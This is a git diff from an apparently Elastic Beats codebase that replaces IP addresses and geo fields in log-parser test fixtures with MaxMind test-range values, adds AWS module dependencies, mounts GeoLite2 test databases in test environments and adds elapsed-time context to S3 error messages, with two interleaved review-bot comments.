@@ -2690,7 +2578,7 @@ "host.hostname": "slave22", "input.type": "log", "log.offset": 10241, - "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root", + "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root", "process.name": "sshd", "process.pid": 2785, "related.hosts": [ @@ -2724,7 +2612,7 @@ "host.hostname": "slave22", "input.type": "log", "log.offset": 10465, - "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root", + "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root", "process.name": "sshd", "process.pid": 2797, "related.hosts": [ @@ -2777,22 +2665,18 @@ "slave22" ], "related.ip": [ - "202.109.143.106" + "202.196.224.106" ], "related.user": [ "root" ], "service.type": "system", - "source.as.number": 4134, - "source.as.organization.name": "No.31,Jin-rong Street", "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "CN", - "source.geo.country_name": "China", - "source.geo.location.lat": 28.55, - "source.geo.location.lon": 115.9333, - "source.geo.region_iso_code": "CN-JX", - "source.geo.region_name": "Jiangxi", - "source.ip": "202.109.143.106", + "source.geo.country_iso_code": "PH", + "source.geo.country_name": "Philippines", + "source.geo.location.lat": 13.0, + "source.geo.location.lon": 122.0, + "source.ip": "202.196.224.106", "source.port": 1347, "system.auth.ssh.event": "Failed", "system.auth.ssh.method": "password", diff --git a/filebeat/module/system/auth/test/test.log b/filebeat/module/system/auth/test/test.log index d1bea07e2a21..1766868fdd3c 100644 --- a/filebeat/module/system/auth/test/test.log +++ b/filebeat/module/system/auth/test/test.log 
@@ -1,9 +1,9 @@ Feb 21 21:54:44 localhost sshd[3402]: Accepted publickey for vagrant from 10.0.2.2 port 63673 ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84 Feb 23 00:13:35 localhost sshd[7483]: Accepted password for vagrant from 192.168.33.1 port 58803 ssh2 Feb 21 21:56:12 localhost sshd[3430]: Invalid user test from 10.0.2.2 -Feb 20 08:35:22 slave22 sshd[5774]: Failed password for root from 116.31.116.24 port 29160 ssh2 +Feb 20 08:35:22 slave22 sshd[5774]: Failed password for root from 216.160.83.57 port 29160 ssh2 Feb 21 23:35:33 localhost sudo: vagrant : TTY=pts/0 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/ls -Feb 19 15:30:04 slave22 sshd[18406]: Did not receive identification string from 123.57.245.163 +Feb 19 15:30:04 slave22 sshd[18406]: Did not receive identification string from 2.125.160.217 Feb 23 00:08:48 localhost sudo: vagrant : TTY=pts/1 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/cat /var/log/secure Feb 24 00:13:02 precise32 sudo: tsg : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/ls Feb 22 11:47:05 localhost groupadd[6991]: new group: name=apache, GID=48 diff --git a/filebeat/module/system/auth/test/test.log-expected.json b/filebeat/module/system/auth/test/test.log-expected.json index de48fc115401..ffea8aac02f8 100644 --- a/filebeat/module/system/auth/test/test.log-expected.json +++ b/filebeat/module/system/auth/test/test.log-expected.json 
@@ -132,22 +132,22 @@ "slave22" ], "related.ip": [ - "116.31.116.24" + "216.160.83.57" ], "related.user": [ "root" ], "service.type": "system", - "source.as.number": 134764, - "source.as.organization.name": "CHINANET Guangdong province network", - "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "CN", - "source.geo.country_name": "China", - "source.geo.location.lat": 23.1167, - "source.geo.location.lon": 113.25, - "source.geo.region_iso_code": "CN-GD", - "source.geo.region_name": "Guangdong", - "source.ip": "116.31.116.24", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "source.port": 29160, "system.auth.ssh.event": "Failed", "system.auth.ssh.method": "password", 
@@ -193,21 +193,19 @@ "slave22" ], "related.ip": [ - "123.57.245.163" + "2.125.160.217" ], "service.type": "system", - "source.as.number": 37963, - "source.as.organization.name": "Hangzhou Alibaba Advertising Co.,Ltd.", - "source.geo.city_name": "Hangzhou", - "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "CN", - "source.geo.country_name": "China", - "source.geo.location.lat": 30.294, - "source.geo.location.lon": 120.1619, - "source.geo.region_iso_code": "CN-ZJ", - "source.geo.region_name": "Zhejiang", - "source.ip": "123.57.245.163", - "system.auth.ssh.dropped_ip": "123.57.245.163" + "source.geo.city_name": "Boxford", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.75, + "source.geo.location.lon": -1.25, + "source.geo.region_iso_code": "GB-WBK", + "source.geo.region_name": "West Berkshire", + "source.ip": "2.125.160.217", + "system.auth.ssh.dropped_ip": "2.125.160.217" }, { "event.dataset": "system.auth", @@ -217,7 +215,7 @@ "fileset.name": "auth", "host.hostname": "localhost", "input.type": "log", - "log.offset": 617, + "log.offset": 616, "process.name": "sudo", "related.hosts": [ "localhost" @@ -242,7 +240,7 @@ "fileset.name": "auth", "host.hostname": "precise32", "input.type": "log", - "log.offset": 736, + "log.offset": 735, "process.name": "sudo", "related.hosts": [ "precise32" @@ -278,7 +276,7 @@ "group.name": "apache", "host.hostname": "localhost", "input.type": "log", - "log.offset": 861, + "log.offset": 860, "process.name": "groupadd", "process.pid": 6991, "related.hosts": [ @@ -303,7 +301,7 @@ "group.id": "48", "host.hostname": "localhost", "input.type": "log", - "log.offset": 934, + "log.offset": 933, "process.name": "useradd", "process.pid": 6995, "related.hosts": [ diff --git a/filebeat/module/traefik/access/test/test.log b/filebeat/module/traefik/access/test/test.log index a271309d2144..868d2906f2d2 100644 
--- a/filebeat/module/traefik/access/test/test.log +++ b/filebeat/module/traefik/access/test/test.log 
@@ -1,7 +1,7 @@ 192.168.33.1 - - [02/Oct/2017:20:22:07 +0000] "GET /ui/favicons/favicon-16x16.png HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 262 "Host-host-1" "http://172.19.0.3:5601" 2ms -85.181.35.98 - - [02/Oct/2017:20:22:08 +0000] "GET /ui/favicons/favicon.ico HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 271 "Host-host1" "http://172.19.0.3:5601" 3ms -70.29.80.15 - - [28/Feb/2018:17:30:33 +0000] "GET /en/ HTTP/2.0" 200 2814 - "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1" 13 "Host-host1-com-0" "http://172.19.0.6:14008" 247ms +81.2.69.143 - - [02/Oct/2017:20:22:08 +0000] "GET /ui/favicons/favicon.ico HTTP/1.1" 304 0 "http://example.com/login" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 271 "Host-host1" "http://172.19.0.3:5601" 3ms +67.43.156.15 - - [28/Feb/2018:17:30:33 +0000] "GET /en/ HTTP/2.0" 200 2814 - "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1" 13 "Host-host1-com-0" "http://172.19.0.6:14008" 247ms ::1 - - [29/Nov/2018:15:03:51 +0000] "GET / HTTP/1.1" 404 19 "-" "curl/7.62.0" 10 "backend not found" "/" 0ms -94.254.131.115 - - [19/Jan/2018:10:01:02 +0000] "GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1" 200 85 - "Android" 623112 "Host-api-wearerealitygames-com-2" "http://172.25.0.9:4140" 13ms -89.64.35.193 - - [19/Jan/2018:10:01:02 +0000] "GET 
/marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1" 200 150 - "Android" 623114 "Host-api-wearerealitygames-com-2" "http://172.25.0.6:4140" 8ms +216.160.83.60 - - [19/Jan/2018:10:01:02 +0000] "GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1" 200 85 - "Android" 623112 "Host-api-wearerealitygames-com-2" "http://172.25.0.9:4140" 13ms +81.2.69.193 - - [19/Jan/2018:10:01:02 +0000] "GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1" 200 150 - "Android" 623114 "Host-api-wearerealitygames-com-2" "http://172.25.0.6:4140" 8ms 127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 diff --git a/filebeat/module/traefik/access/test/test.log-expected.json b/filebeat/module/traefik/access/test/test.log-expected.json index ce695210bef1..9a40d0e57cfb 100644 --- a/filebeat/module/traefik/access/test/test.log-expected.json +++ b/filebeat/module/traefik/access/test/test.log-expected.json 
@@ -50,7 +50,7 @@ "event.duration": 3000000, "event.kind": "event", "event.module": "traefik", - "event.original": "85.181.35.98 - - [02/Oct/2017:20:22:08 +0000] \"GET /ui/favicons/favicon.ico HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 271 \"Host-host1\" \"http://172.19.0.3:5601\" 3ms", + "event.original": "81.2.69.143 - - [02/Oct/2017:20:22:08 +0000] \"GET /ui/favicons/favicon.ico HTTP/1.1\" 304 0 \"http://example.com/login\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\" 271 \"Host-host1\" \"http://172.19.0.3:5601\" 3ms", "event.outcome": "success", "event.type": [ "access" @@ -64,21 +64,19 @@ "input.type": "log", "log.offset": 280, "related.ip": [ - "85.181.35.98" + "81.2.69.143" ], "service.type": "traefik", - "source.address": "85.181.35.98", - "source.as.number": 6805, - "source.as.organization.name": "Telefonica Germany", - "source.geo.city_name": "Berlin", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "DE", - "source.geo.country_name": "Germany", - "source.geo.location.lat": 52.4473, - "source.geo.location.lon": 13.4531, - "source.geo.region_iso_code": "DE-BE", - "source.geo.region_name": "Land Berlin", - "source.ip": "85.181.35.98", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "traefik.access.backend_url": "http://172.19.0.3:5601", "traefik.access.frontend_name": "Host-host1", "traefik.access.request_count": 271, 
@@ -102,7 +100,7 @@ "event.duration": 247000000, "event.kind": "event", "event.module": "traefik", - "event.original": "70.29.80.15 - - [28/Feb/2018:17:30:33 +0000] \"GET /en/ HTTP/2.0\" 200 2814 - \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" 13 \"Host-host1-com-0\" \"http://172.19.0.6:14008\" 247ms", + "event.original": "67.43.156.15 - - [28/Feb/2018:17:30:33 +0000] \"GET /en/ HTTP/2.0\" 200 2814 - \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" 13 \"Host-host1-com-0\" \"http://172.19.0.6:14008\" 247ms", "event.outcome": "success", "event.type": [ "access" @@ -113,23 +111,19 @@ "http.response.status_code": 200, "http.version": "2.0", "input.type": "log", - "log.offset": 553, + "log.offset": 552, "related.ip": [ - "70.29.80.15" + "67.43.156.15" ], "service.type": "traefik", - "source.address": "70.29.80.15", - "source.as.number": 577, - "source.as.organization.name": "Bell Canada", - "source.geo.city_name": "Ottawa", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "CA", - "source.geo.country_name": "Canada", - "source.geo.location.lat": 45.2691, - "source.geo.location.lon": -75.7518, - "source.geo.region_iso_code": "CA-ON", - "source.geo.region_name": "Ontario", - "source.ip": "70.29.80.15", + "source.address": "67.43.156.15", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.15", "traefik.access.backend_url": "http://172.19.0.6:14008", "traefik.access.frontend_name": "Host-host1-com-0", "traefik.access.request_count": 13, 
@@ -194,7 +188,7 @@ "event.duration": 13000000, "event.kind": "event", "event.module": "traefik", - "event.original": "94.254.131.115 - - [19/Jan/2018:10:01:02 +0000] \"GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1\" 200 85 - \"Android\" 623112 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.9:4140\" 13ms", + "event.original": "216.160.83.60 - - [19/Jan/2018:10:01:02 +0000] \"GET /assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo HTTP/1.1\" 200 85 - \"Android\" 623112 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.9:4140\" 13ms", "event.outcome": "success", "event.type": [ "access" 
@@ -207,21 +201,20 @@ "input.type": "log", "log.offset": 931, "related.ip": [ - "94.254.131.115" + "216.160.83.60" ], "service.type": "traefik", - "source.address": "94.254.131.115", - "source.as.number": 39603, - "source.as.organization.name": "Play", - "source.geo.city_name": "Warsaw", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "PL", - "source.geo.country_name": "Poland", - "source.geo.location.lat": 52.25, - "source.geo.location.lon": 21.0, - "source.geo.region_iso_code": "PL-14", - "source.geo.region_name": "Mazovia", - "source.ip": "94.254.131.115", + "source.address": "216.160.83.60", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.60", "traefik.access.backend_url": "http://172.25.0.9:4140", "traefik.access.frontend_name": "Host-api-wearerealitygames-com-2", "traefik.access.request_count": 623112, 
@@ -244,7 +237,7 @@ "event.duration": 8000000, "event.kind": "event", "event.module": "traefik", - "event.original": "89.64.35.193 - - [19/Jan/2018:10:01:02 +0000] \"GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1\" 200 150 - \"Android\" 623114 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.6:4140\" 8ms", + "event.original": "81.2.69.193 - - [19/Jan/2018:10:01:02 +0000] \"GET /marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM HTTP/1.1\" 200 150 - \"Android\" 623114 \"Host-api-wearerealitygames-com-2\" \"http://172.25.0.6:4140\" 8ms", "event.outcome": "success", "event.type": [ "access" 
@@ -255,23 +248,21 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 1267, + "log.offset": 1266, "related.ip": [ - "89.64.35.193" + "81.2.69.193" ], "service.type": "traefik", - "source.address": "89.64.35.193", - "source.as.number": 6830, - "source.as.organization.name": "Liberty Global B.V.", - "source.geo.city_name": "Gda\u0144sk", + "source.address": "81.2.69.193", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "PL", - "source.geo.country_name": "Poland", - "source.geo.location.lat": 54.3605, - "source.geo.location.lon": 18.649, - "source.geo.region_iso_code": "PL-22", - "source.geo.region_name": "Pomerania", - "source.ip": "89.64.35.193", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "traefik.access.backend_url": "http://172.25.0.6:4140", "traefik.access.frontend_name": "Host-api-wearerealitygames-com-2", "traefik.access.request_count": 623114, @@ -304,7 +295,7 @@ "http.response.status_code": 200, "http.version": "1.0", "input.type": "log", - "log.offset": 1581, + "log.offset": 1579, "related.ip": [ "127.0.0.1" ], diff --git a/go.mod b/go.mod index a2dc34ec7332..b0b1a53eac42 100644 --- a/go.mod +++ b/go.mod 
@@ -30,8 +30,10 @@ require (
 github.com/apoydence/eachers v0.0.0-20181020210610-23942921fe77 // indirect
 github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5
 github.com/aws/aws-lambda-go v1.13.3
+ github.com/aws/aws-sdk-go v1.19.48
 github.com/aws/aws-sdk-go-v2 v0.24.0
 github.com/awslabs/goformation/v4 v4.1.0
+ github.com/awslabs/kinesis-aggregation/go v0.0.0-20200810181507-d352038274c0
 github.com/blakesmith/ar v0.0.0-20150311145944-8bd4349a67f2
 github.com/bsm/sarama-cluster v2.1.14-0.20180625083203-7e67d87a6b3f+incompatible
 github.com/cavaliercoder/badio v0.0.0-20160213150051-ce5280129e9e // indirect
diff --git a/go.sum b/go.sum
index 94ace7c2cd49..8d0167b62e3b 100644
--- a/go.sum
+++ b/go.sum
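Review bot: The new `github.com/aws/aws-sdk-go v1.19.48` requirement pins what appears to be a 2019-era v1 SDK alongside the existing `github.com/aws/aws-sdk-go-v2 v0.24.0`, so the module now carries two generations of the AWS SDK with separate credential, retry and TLS code paths to keep patched. It looks like a transitive requirement of the added `github.com/awslabs/kinesis-aggregation/go` pseudo-version rather than something this repository imports directly; if so, consider bumping the v1 line to a current release (minimal version selection makes a newer pin safe) and noting in the `require` block why both SDKs are present, e.g. `// transitive via kinesis-aggregation; bump with it`.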
@@ -172,11 +172,15 @@ github.com/asaskevich/govalidator v0.0.0-20190424111038-f61b66f89f4a/go.mod h1:l github.com/aws/aws-lambda-go v1.13.3 h1:SuCy7H3NLyp+1Mrfp+m80jcbi9KYWAs9/BXwppwRDzY= github.com/aws/aws-lambda-go v1.13.3/go.mod h1:4UKl9IzQMoD+QF79YdCuzCwp8VbmG4VAQwij/eHl5CU= github.com/aws/aws-sdk-go v1.15.11/go.mod h1:mFuSZ37Z9YOHbQEwBWztmVzqXrEkub65tZoCYDt7FT0= +github.com/aws/aws-sdk-go v1.19.48 h1:YhKzuc9xggUt8jNDc5CmIBeB8GmGtazzq0aCXO4sj6w= +github.com/aws/aws-sdk-go v1.19.48/go.mod h1:KmX6BPdI08NWTb3/sm4ZGu5ShLoqVDhKgpiN924inxo= github.com/aws/aws-sdk-go-v2 v0.24.0 h1:R0lL0krk9EyTI1vmO1ycoeceGZotSzCKO51LbPGq3rU= github.com/aws/aws-sdk-go-v2 v0.24.0/go.mod h1:2LhT7UgHOXK3UXONKI5OMgIyoQL6zTAw/jwIeX6yqzw= github.com/awslabs/goformation/v3 v3.1.0/go.mod h1:hQ5RXo3GNm2laHWKizDzU5DsDy+yNcenSca2UxN0850= github.com/awslabs/goformation/v4 v4.1.0 h1:JRxIW0IjhYpYDrIZOTJGMu2azXKI+OK5dP56ubpywGU= github.com/awslabs/goformation/v4 v4.1.0/go.mod h1:MBDN7u1lMNDoehbFuO4uPvgwPeolTMA2TzX1yO6KlxI= +github.com/awslabs/kinesis-aggregation/go v0.0.0-20200810181507-d352038274c0 h1:D97PNkeea5i2Sbq844BdbULqI5pv7yQw4thPwqEX504= +github.com/awslabs/kinesis-aggregation/go v0.0.0-20200810181507-d352038274c0/go.mod h1:SghidfnxvX7ribW6nHI7T+IBbc9puZ9kk5Tx/88h8P4= github.com/beorn7/perks v0.0.0-20160804104726-4c0e84591b9a/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q= github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q= github.com/beorn7/perks v1.0.0/go.mod h1:KWe93zE9D1o94FZ5RNwFwVgaQK1VOXiVxmqh+CedLV8= diff --git a/libbeat/tests/system/test_dashboard.py b/libbeat/tests/system/test_dashboard.py index 338e832b0457..e02a644213e8 100644 --- a/libbeat/tests/system/test_dashboard.py +++ b/libbeat/tests/system/test_dashboard.py 
@@ -208,6 +208,7 @@ def test_dev_tool_export_dashboard_by_id_unknown_id(self): assert p.returncode != 0 + @unittest.skip("Failing test: https://github.com/elastic/beats/issues/29327") @unittest.skipUnless(INTEGRATION_TESTS, "integration test") @pytest.mark.tag('integration') def test_dev_tool_export_dashboard_by_id_from_space(self): diff --git a/testing/environments/GeoLite2-ASN.mmdb b/testing/environments/GeoLite2-ASN.mmdb new file mode 100644 index 000000000000..fd4a733ba05a Binary files /dev/null and b/testing/environments/GeoLite2-ASN.mmdb differ diff --git a/testing/environments/GeoLite2-City.mmdb b/testing/environments/GeoLite2-City.mmdb new file mode 100644 index 000000000000..88d5e702215f Binary files /dev/null and b/testing/environments/GeoLite2-City.mmdb differ diff --git a/testing/environments/GeoLite2-Country.mmdb b/testing/environments/GeoLite2-Country.mmdb new file mode 100644 index 000000000000..b554a460d1fc Binary files /dev/null and b/testing/environments/GeoLite2-Country.mmdb differ diff --git a/testing/environments/snapshot-oss.yml b/testing/environments/snapshot-oss.yml index 4c041852082b..38f0a2bc4356 100644 --- a/testing/environments/snapshot-oss.yml +++ b/testing/environments/snapshot-oss.yml @@ -3,7 +3,7 @@ version: '2.3' services: elasticsearch: - image: docker.elastic.co/elasticsearch/elasticsearch:8.0.0-cf8e5c68-SNAPSHOT + image: docker.elastic.co/elasticsearch/elasticsearch:8.0.0-fa37006f-SNAPSHOT healthcheck: test: ["CMD-SHELL", "curl -s http://localhost:9200/_cat/health?h=status | grep -q green"] retries: 300 @@ -21,7 +21,7 @@ services: - "script.context.template.cache_max_size=2000" logstash: - image: docker.elastic.co/logstash/logstash-oss:8.0.0-cf8e5c68-SNAPSHOT + image: docker.elastic.co/logstash/logstash-oss:8.0.0-fa37006f-SNAPSHOT healthcheck: test: ["CMD", "curl", "-f", "http://localhost:9600/_node/stats"] retries: 600 
@@ -31,7 +31,7 @@ services: - ./docker/logstash/pki:/etc/pki:ro kibana: - image: docker.elastic.co/kibana/kibana:8.0.0-cf8e5c68-SNAPSHOT + image: docker.elastic.co/kibana/kibana:8.0.0-fa37006f-SNAPSHOT healthcheck: test: ["CMD-SHELL", "curl -s http://localhost:5601/api/status?v8format=true | grep -q '\"overall\":{\"level\":\"available\"'"] retries: 600 diff --git a/testing/environments/snapshot.yml b/testing/environments/snapshot.yml index a5d114d30f8d..87efda65f71b 100644 --- a/testing/environments/snapshot.yml +++ b/testing/environments/snapshot.yml @@ -3,7 +3,7 @@ version: '2.3' services: elasticsearch: - image: docker.elastic.co/elasticsearch/elasticsearch:8.0.0-cf8e5c68-SNAPSHOT + image: docker.elastic.co/elasticsearch/elasticsearch:8.0.0-fa37006f-SNAPSHOT healthcheck: test: ["CMD-SHELL", "curl -s http://localhost:9200/_cat/health?h=status | grep -q green"] retries: 300 
@@ -14,14 +14,17 @@ services: - "transport.host=127.0.0.1" - "http.host=0.0.0.0" - "xpack.security.enabled=false" - - "script.context.template.max_compilations_rate=unlimited" - - "script.context.ingest.cache_max_size=2000" - - "script.context.processor_conditional.cache_max_size=2000" - - "script.context.template.cache_max_size=2000" + # We want something as unlimited compilation rate, but 'unlimited' is not valid. + - "script.max_compilations_rate=100000/1m" - "action.destructive_requires_name=false" # Disable geoip updates to prevent golden file test failures when the database # changes and prevent race conditions between tests and database updates. - "ingest.geoip.downloader.enabled=false" + volumes: + # Test files from https://github.com/maxmind/MaxMind-DB/tree/2bf1713b3b5adcb022cf4bb77eb0689beaadcfef/test-data + - "./GeoLite2-ASN.mmdb:/usr/share/elasticsearch/config/ingest-geoip/GeoLite2-ASN.mmdb:ro" + - "./GeoLite2-City.mmdb:/usr/share/elasticsearch/config/ingest-geoip/GeoLite2-City.mmdb:ro" + - "./GeoLite2-Country.mmdb:/usr/share/elasticsearch/config/ingest-geoip/GeoLite2-Country.mmdb:ro" logstash: image: docker.elastic.co/logstash/logstash@sha256:e01cf165142edf8d67485115b938c94deeda66153e9516aa2ce69ee417c5fc33 @@ -34,7 +37,7 @@ services: - ./docker/logstash/pki:/etc/pki:ro kibana: - image: docker.elastic.co/kibana/kibana:8.0.0-cf8e5c68-SNAPSHOT + image: docker.elastic.co/kibana/kibana:8.0.0-fa37006f-SNAPSHOT healthcheck: test: ["CMD-SHELL", "curl -s http://localhost:5601/api/status?v8format=true | grep -q '\"overall\":{\"level\":\"available\"'"] retries: 600 diff --git a/x-pack/filebeat/input/awss3/s3_objects.go b/x-pack/filebeat/input/awss3/s3_objects.go index 2839c31e2253..7fe6b193fa45 100644 --- a/x-pack/filebeat/input/awss3/s3_objects.go +++ b/x-pack/filebeat/input/awss3/s3_objects.go 
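Review bot: The `@@ -14,14 +14,17 @@` hunk in snapshot.yml replaces the four `script.context.*` settings with `- "script.max_compilations_rate=100000/1m"`, but snapshot-oss.yml in this same commit still carries `- "script.context.template.cache_max_size=2000"` (visible in its `@@ -21,7 +21,7 @@` context), so the two test environments now diverge on Elasticsearch script settings. If the `script.context.*` keys are no longer accepted by the 8.0 snapshot, snapshot-oss.yml needs the same replacement; if they are still accepted, the comment above the new line should say why only this file changed. The three GeoLite2 test databases are mounted read-only and `ingest.geoip.downloader.enabled=false` is kept, which is what makes the golden files deterministic; a one-line comment such as `# Golden files use IPs from the MaxMind test ranges; do not enable the downloader` next to the mounts would stop a later edit from re-enabling updates and breaking the fixtures.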
@@ -120,23 +120,22 @@ func (p *s3ObjectProcessor) ProcessS3Object() error {
 }
 
 // Metrics and Logging
- {
- p.log.Debug("Begin S3 object processing.")
- p.metrics.s3ObjectsRequestedTotal.Inc()
- p.metrics.s3ObjectsInflight.Inc()
- start := time.Now()
- defer func() {
- elapsed := time.Since(start)
- p.metrics.s3ObjectsInflight.Dec()
- p.metrics.s3ObjectProcessingTime.Update(elapsed.Nanoseconds())
- p.log.Debugw("End S3 object processing.", "elapsed_time_ns", elapsed)
- }()
- }
+ p.log.Debug("Begin S3 object processing.")
+ p.metrics.s3ObjectsRequestedTotal.Inc()
+ p.metrics.s3ObjectsInflight.Inc()
+ start := time.Now()
+ defer func() {
+ elapsed := time.Since(start)
+ p.metrics.s3ObjectsInflight.Dec()
+ p.metrics.s3ObjectProcessingTime.Update(elapsed.Nanoseconds())
+ p.log.Debugw("End S3 object processing.", "elapsed_time_ns", elapsed)
+ }()
 
 // Request object (download).
 contentType, meta, body, err := p.download()
 if err != nil {
- return errors.Wrap(err, "failed to get s3 object")
+ return errors.Wrapf(err, "failed to get s3 object (elasped_time_ns=%d)",
+ time.Since(start).Nanoseconds())
 }
 defer body.Close()
 p.s3Metadata = meta
@@ -159,7 +158,8 @@ func (p *s3ObjectProcessor) ProcessS3Object() error {
 err = p.readFile(reader)
 }
 if err != nil {
- return err
+ return errors.Wrapf(err, "failed reading s3 object (elasped_time_ns=%d)",
+ time.Since(start).Nanoseconds())
 }
 
 return nil
diff --git a/x-pack/filebeat/input/awss3/sqs.go b/x-pack/filebeat/input/awss3/sqs.go
index 56f35e473ce4..1f13ec010cf7 100644
--- a/x-pack/filebeat/input/awss3/sqs.go
